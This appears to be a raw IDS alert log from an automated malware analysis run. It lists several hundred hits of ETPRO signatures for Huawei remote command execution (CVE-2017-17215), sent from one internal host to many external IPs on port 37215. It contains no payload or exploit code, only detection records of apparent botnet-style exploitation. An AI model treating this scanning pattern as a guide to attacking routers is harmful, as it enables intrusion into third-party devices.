                                                    07/10/24-08:27:23.782637TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4894837215192.168.2.14157.203.204.48
                                                    07/10/24-08:26:43.702243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4948237215192.168.2.1466.136.56.210
                                                    07/10/24-08:27:14.675779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4384837215192.168.2.14157.33.22.177
                                                    07/10/24-08:26:49.781764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4924837215192.168.2.1441.56.156.158
                                                    07/10/24-08:27:05.121517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3797637215192.168.2.14157.9.12.116
                                                    07/10/24-08:26:55.428657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5420437215192.168.2.14132.55.77.140
                                                    07/10/24-08:26:28.931862TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4652437215192.168.2.14157.158.204.32
                                                    07/10/24-08:26:45.636858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4120237215192.168.2.14157.4.103.162
                                                    07/10/24-08:26:43.676361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5811437215192.168.2.14197.2.223.162
                                                    07/10/24-08:26:38.584123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4807037215192.168.2.1441.200.79.194
                                                    07/10/24-08:26:28.890895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3652637215192.168.2.1469.124.78.93
                                                    07/10/24-08:26:31.065444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4731037215192.168.2.14157.175.224.62
                                                    07/10/24-08:27:22.874012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4573437215192.168.2.14197.138.150.205
                                                    07/10/24-08:26:38.590532TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5854437215192.168.2.14197.12.123.74
                                                    07/10/24-08:26:45.658407TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5964237215192.168.2.1441.229.232.125
                                                    07/10/24-08:27:02.908233TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5213037215192.168.2.1441.250.2.177
                                                    07/10/24-08:26:45.632030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4483837215192.168.2.14197.219.151.228
                                                    07/10/24-08:27:05.183649TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5468437215192.168.2.1448.91.84.131
                                                    07/10/24-08:26:57.603262TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4917037215192.168.2.1441.44.21.75
                                                    07/10/24-08:26:57.565173TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4142437215192.168.2.1441.155.156.73
                                                    07/10/24-08:27:30.423291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5724037215192.168.2.14157.37.16.154
                                                    07/10/24-08:26:53.129379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4079437215192.168.2.14197.106.2.208
                                                    07/10/24-08:26:43.667118TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5570837215192.168.2.14157.170.108.185
                                                    07/10/24-08:26:13.753198TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4119837215192.168.2.1441.233.94.62
                                                    07/10/24-08:26:31.109229TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3561637215192.168.2.14157.126.106.94
                                                    07/10/24-08:26:59.804937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5605437215192.168.2.1441.167.177.143
                                                    07/10/24-08:27:31.533375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5558637215192.168.2.14186.0.14.192
                                                    07/10/24-08:26:57.655011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4472437215192.168.2.14197.96.178.61
                                                    07/10/24-08:26:43.631742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4239237215192.168.2.14157.197.229.177
                                                    07/10/24-08:26:31.056183TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4237037215192.168.2.1441.198.159.241
                                                    07/10/24-08:27:32.603771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5324237215192.168.2.14157.187.62.63
                                                    07/10/24-08:26:33.260181TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4491637215192.168.2.14157.224.172.66
                                                    07/10/24-08:27:11.519267TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3663437215192.168.2.14157.49.43.155
                                                    07/10/24-08:27:24.901081TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3315037215192.168.2.14133.148.214.21
                                                    07/10/24-08:26:25.498788TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4088237215192.168.2.1469.204.213.180
                                                    07/10/24-08:26:17.998303TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5246837215192.168.2.14157.168.176.170
                                                    07/10/24-08:26:26.537875TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3934037215192.168.2.1441.30.4.41
                                                    07/10/24-08:26:42.404259TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4012837215192.168.2.1497.37.142.108
                                                    07/10/24-08:27:23.948745TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3803437215192.168.2.14212.23.115.146
                                                    07/10/24-08:27:31.446211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4226437215192.168.2.14157.177.12.162
                                                    07/10/24-08:27:22.783603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4027837215192.168.2.14148.196.251.20
                                                    07/10/24-08:27:10.772266TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3444437215192.168.2.1469.115.193.55
                                                    07/10/24-08:27:32.476844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4375237215192.168.2.14197.92.156.129
                                                    07/10/24-08:27:17.067488TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5255837215192.168.2.14197.159.195.216
                                                    07/10/24-08:27:22.926271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4434037215192.168.2.14157.70.197.101
                                                    07/10/24-08:27:22.765869TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4769837215192.168.2.1453.12.74.190
                                                    07/10/24-08:26:22.282645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4577037215192.168.2.1441.78.115.54
                                                    07/10/24-08:27:27.089146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5957637215192.168.2.1469.68.95.36
                                                    07/10/24-08:26:31.071097TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4955837215192.168.2.14197.94.109.202
                                                    07/10/24-08:26:36.395697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3654437215192.168.2.14171.164.175.35
                                                    07/10/24-08:27:22.469991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5135037215192.168.2.14157.131.160.125
                                                    07/10/24-08:26:55.413827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5495637215192.168.2.1441.208.189.214
                                                    07/10/24-08:26:47.981369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3619237215192.168.2.1441.46.201.208
                                                    07/10/24-08:27:28.130365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3852837215192.168.2.14197.117.178.219
                                                    07/10/24-08:27:07.376838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4877437215192.168.2.14179.255.251.34
                                                    07/10/24-08:26:43.929800TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4493837215192.168.2.1418.253.221.208
                                                    07/10/24-08:26:29.869473TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5729037215192.168.2.14197.23.181.195
                                                    07/10/24-08:26:20.142588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5041837215192.168.2.14211.229.56.80
                                                    07/10/24-08:26:20.148665TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5412437215192.168.2.14154.129.126.247
                                                    07/10/24-08:26:59.642671TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5642637215192.168.2.1441.215.197.203
                                                    07/10/24-08:27:17.073080TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4811637215192.168.2.14157.117.27.245
                                                    07/10/24-08:26:47.867621TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3925037215192.168.2.14218.6.101.32
                                                    07/10/24-08:27:05.195980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5172237215192.168.2.14157.168.169.223
                                                    07/10/24-08:26:29.836593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4536237215192.168.2.1441.144.1.9
                                                    07/10/24-08:26:29.842424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3559637215192.168.2.14197.198.149.8
                                                    07/10/24-08:26:31.076379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4433437215192.168.2.1441.245.128.217
                                                    07/10/24-08:27:22.802348TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4114637215192.168.2.14197.122.139.161
                                                    07/10/24-08:27:23.925021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5124237215192.168.2.1441.239.249.249
                                                    07/10/24-08:27:05.216046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5276437215192.168.2.1441.233.251.78
                                                    07/10/24-08:26:45.624283TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4347637215192.168.2.14129.145.76.120
                                                    07/10/24-08:27:22.539034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3857837215192.168.2.14197.173.201.93
                                                    07/10/24-08:27:14.761974TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4331437215192.168.2.14176.121.54.72
                                                    07/10/24-08:27:30.534474TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4426437215192.168.2.1459.95.18.251
                                                    07/10/24-08:26:47.979211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5322237215192.168.2.1457.218.243.164
                                                    07/10/24-08:26:23.353387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3321637215192.168.2.14157.80.133.70
                                                    07/10/24-08:26:29.835368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5715237215192.168.2.14157.170.134.60
                                                    07/10/24-08:27:13.886782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4641037215192.168.2.14157.235.223.87
                                                    07/10/24-08:27:24.860339TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4550837215192.168.2.1474.191.214.75
                                                    07/10/24-08:26:33.217527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6040037215192.168.2.14197.109.6.28
                                                    07/10/24-08:27:02.872706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3833837215192.168.2.1451.72.42.142
                                                    07/10/24-08:26:22.237415TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5362437215192.168.2.1441.38.255.196
                                                    07/10/24-08:26:22.209448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5542637215192.168.2.14157.179.103.239
                                                    07/10/24-08:27:32.599203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4053637215192.168.2.14157.251.237.26
                                                    07/10/24-08:27:23.453421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4392437215192.168.2.1441.164.177.79
                                                    07/10/24-08:26:15.873378TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3467837215192.168.2.14197.180.133.107
                                                    07/10/24-08:26:33.165802TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5738037215192.168.2.1441.7.206.119
                                                    07/10/24-08:27:10.751159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4123637215192.168.2.14157.15.224.164
                                                    07/10/24-08:26:14.828037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5726437215192.168.2.1441.37.166.86
                                                    07/10/24-08:26:26.589238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4333837215192.168.2.14197.139.120.131
                                                    07/10/24-08:26:43.881227TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5598837215192.168.2.14157.118.115.30
                                                    07/10/24-08:26:57.588431TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5000237215192.168.2.14209.224.128.10
                                                    07/10/24-08:27:10.679025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3599437215192.168.2.1441.123.139.221
                                                    07/10/24-08:27:27.126128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5310237215192.168.2.14157.201.11.40
                                                    07/10/24-08:27:22.532375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5041237215192.168.2.1441.233.11.241
                                                    07/10/24-08:27:10.751291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3566437215192.168.2.14157.186.154.36
                                                    07/10/24-08:26:29.861363TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3307237215192.168.2.1441.64.140.180
                                                    07/10/24-08:26:14.627003TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5386837215192.168.2.1441.27.9.102
                                                    07/10/24-08:26:59.593100TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3450637215192.168.2.1441.52.75.55
                                                    07/10/24-08:27:30.547260TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4306437215192.168.2.14157.254.37.173
                                                    07/10/24-08:27:22.866153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4777837215192.168.2.14165.84.48.189
                                                    07/10/24-08:26:17.986664TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5723637215192.168.2.1441.253.58.119
                                                    07/10/24-08:26:34.225930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3577837215192.168.2.1465.111.199.137
                                                    07/10/24-08:27:17.020582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4965437215192.168.2.14197.71.138.194
                                                    07/10/24-08:26:28.904188TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3959637215192.168.2.14197.94.52.197
                                                    07/10/24-08:26:28.821569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3509437215192.168.2.1441.116.111.61
                                                    07/10/24-08:26:34.191107TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3809437215192.168.2.1441.87.142.162
                                                    07/10/24-08:26:20.192710TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5716237215192.168.2.1483.244.177.212
                                                    07/10/24-08:26:57.662130TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5075237215192.168.2.14157.73.199.14
                                                    07/10/24-08:27:33.759873TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4602037215192.168.2.14123.223.17.90
                                                    07/10/24-08:27:02.876445TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5189237215192.168.2.14197.181.76.2
                                                    07/10/24-08:26:31.081032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4088237215192.168.2.1441.209.192.84
                                                    07/10/24-08:27:13.829336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5273037215192.168.2.14128.95.165.93
                                                    07/10/24-08:26:20.148886TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3716637215192.168.2.14197.184.107.247
                                                    07/10/24-08:26:59.643122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4484637215192.168.2.14157.238.160.83
                                                    07/10/24-08:27:03.000595TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4485237215192.168.2.14157.33.67.69
                                                    07/10/24-08:26:22.288266TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4996637215192.168.2.1441.242.83.216
                                                    07/10/24-08:26:13.778928TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4695437215192.168.2.14157.199.168.111
                                                    07/10/24-08:27:28.049112TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3660237215192.168.2.1445.155.61.42
                                                    07/10/24-08:26:45.597110TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6022237215192.168.2.1441.171.152.166
                                                    07/10/24-08:27:19.309217TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5114037215192.168.2.145.69.125.71
                                                    07/10/24-08:27:13.843143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5852237215192.168.2.14197.48.14.216
                                                    07/10/24-08:27:31.484442TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3340437215192.168.2.14157.66.99.26
                                                    07/10/24-08:26:59.665710TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4709437215192.168.2.1441.130.10.50
                                                    07/10/24-08:26:36.339944TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5519837215192.168.2.14197.179.142.231
                                                    07/10/24-08:26:28.791726TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3938437215192.168.2.1441.140.84.44
                                                    07/10/24-08:26:28.729820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4010437215192.168.2.14157.169.237.251
                                                    07/10/24-08:26:42.126457TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4317437215192.168.2.14197.72.43.65
                                                    07/10/24-08:27:11.537934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3281837215192.168.2.14157.122.85.107
                                                    07/10/24-08:27:10.569489TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3422237215192.168.2.14197.37.40.53
                                                    07/10/24-08:26:23.358336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3939637215192.168.2.14157.36.29.160
                                                    07/10/24-08:27:33.862300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4210437215192.168.2.1441.183.119.38
                                                    07/10/24-08:26:29.839757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5718437215192.168.2.14157.98.33.41
                                                    07/10/24-08:27:33.825878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4375637215192.168.2.14213.18.91.52
                                                    07/10/24-08:26:36.342086TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5682837215192.168.2.14195.99.231.152
                                                    07/10/24-08:27:33.825878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4095237215192.168.2.14157.188.55.147
                                                    07/10/24-08:26:15.881416TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6020837215192.168.2.1486.132.26.226
                                                    07/10/24-08:26:25.481088TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3409437215192.168.2.14197.63.110.79
                                                    07/10/24-08:26:59.559919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4705037215192.168.2.14197.63.70.197
                                                    07/10/24-08:27:17.071296TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5077837215192.168.2.1432.148.188.83
                                                    07/10/24-08:26:47.995601TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4087037215192.168.2.14197.41.63.43
                                                    07/10/24-08:27:24.993210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5183037215192.168.2.1441.38.57.228
                                                    07/10/24-08:26:18.020440TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4238237215192.168.2.14197.107.20.213
                                                    07/10/24-08:26:53.197285TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6046037215192.168.2.14105.178.242.107
                                                    07/10/24-08:26:53.205499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3806237215192.168.2.14157.95.81.201
                                                    07/10/24-08:26:25.478024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3370237215192.168.2.14184.53.187.133
                                                    07/10/24-08:27:03.007321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4617237215192.168.2.14125.47.252.13
                                                    07/10/24-08:27:24.837917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5801037215192.168.2.1441.231.73.228
                                                    07/10/24-08:27:33.848212TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6092237215192.168.2.1441.0.252.101
                                                    07/10/24-08:27:22.757983TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4166437215192.168.2.14157.100.112.65
                                                    07/10/24-08:26:23.290002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5866637215192.168.2.1441.237.82.63
                                                    07/10/24-08:26:47.943853TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5282437215192.168.2.1487.237.156.77
                                                    07/10/24-08:27:14.666917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3709437215192.168.2.1441.216.47.177
                                                    07/10/24-08:26:47.888787TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4664037215192.168.2.14197.218.102.224
                                                    07/10/24-08:27:05.209381TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5876437215192.168.2.1498.165.112.113
                                                    07/10/24-08:27:30.499089TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4843837215192.168.2.1441.152.117.189
                                                    07/10/24-08:26:13.668084TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6058637215192.168.2.14222.117.171.170
                                                    07/10/24-08:27:22.853545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3637837215192.168.2.1441.150.206.113
                                                    07/10/24-08:26:28.837178TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6042637215192.168.2.14197.224.236.31
                                                    07/10/24-08:26:59.651678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6051837215192.168.2.14192.111.37.192
                                                    07/10/24-08:26:25.514524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3316437215192.168.2.14197.103.152.210
                                                    07/10/24-08:27:05.090396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4942837215192.168.2.14157.172.129.128
                                                    07/10/24-08:27:31.550771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4984637215192.168.2.14157.103.195.244
                                                    07/10/24-08:27:30.505741TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4001437215192.168.2.1441.147.88.210
                                                    07/10/24-08:26:38.569394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4350037215192.168.2.14157.96.164.114
                                                    07/10/24-08:27:32.563593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3885637215192.168.2.14197.254.167.90
                                                    07/10/24-08:27:33.875122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4549837215192.168.2.14197.66.72.165
                                                    07/10/24-08:27:24.976669TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4676037215192.168.2.1441.113.77.248
                                                    07/10/24-08:26:31.051862TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5574837215192.168.2.14181.103.118.187
                                                    07/10/24-08:26:51.995673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5392437215192.168.2.14197.128.150.54
                                                    07/10/24-08:26:14.626418TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5335837215192.168.2.1441.186.143.177
                                                    07/10/24-08:26:36.399682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5975237215192.168.2.1441.21.60.101
                                                    07/10/24-08:27:02.716869TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4006637215192.168.2.14191.63.111.20
                                                    07/10/24-08:26:28.733035TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4644237215192.168.2.1441.189.43.100
                                                    07/10/24-08:26:14.826871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5546237215192.168.2.14197.219.87.161
                                                    07/10/24-08:26:59.790586TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5828837215192.168.2.1471.152.13.93
                                                    07/10/24-08:26:14.814573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4556837215192.168.2.1441.159.148.223
                                                    07/10/24-08:27:24.938068TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4635837215192.168.2.14157.114.44.83
                                                    07/10/24-08:27:23.863444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5652037215192.168.2.14197.131.63.195
                                                    07/10/24-08:26:53.125046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6007437215192.168.2.1441.52.112.153
                                                    07/10/24-08:26:36.437986TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6020837215192.168.2.14190.118.191.200
                                                    07/10/24-08:26:55.312291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3772237215192.168.2.1492.226.0.83
                                                    07/10/24-08:27:05.150290TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4240837215192.168.2.14157.90.97.4
                                                    07/10/24-08:27:14.853963TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4708437215192.168.2.14197.183.238.195
                                                    07/10/24-08:26:14.743404TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4875237215192.168.2.14197.186.229.77
                                                    07/10/24-08:26:47.920387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5734837215192.168.2.14157.35.211.247
                                                    07/10/24-08:27:23.832820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3940637215192.168.2.14197.113.26.209
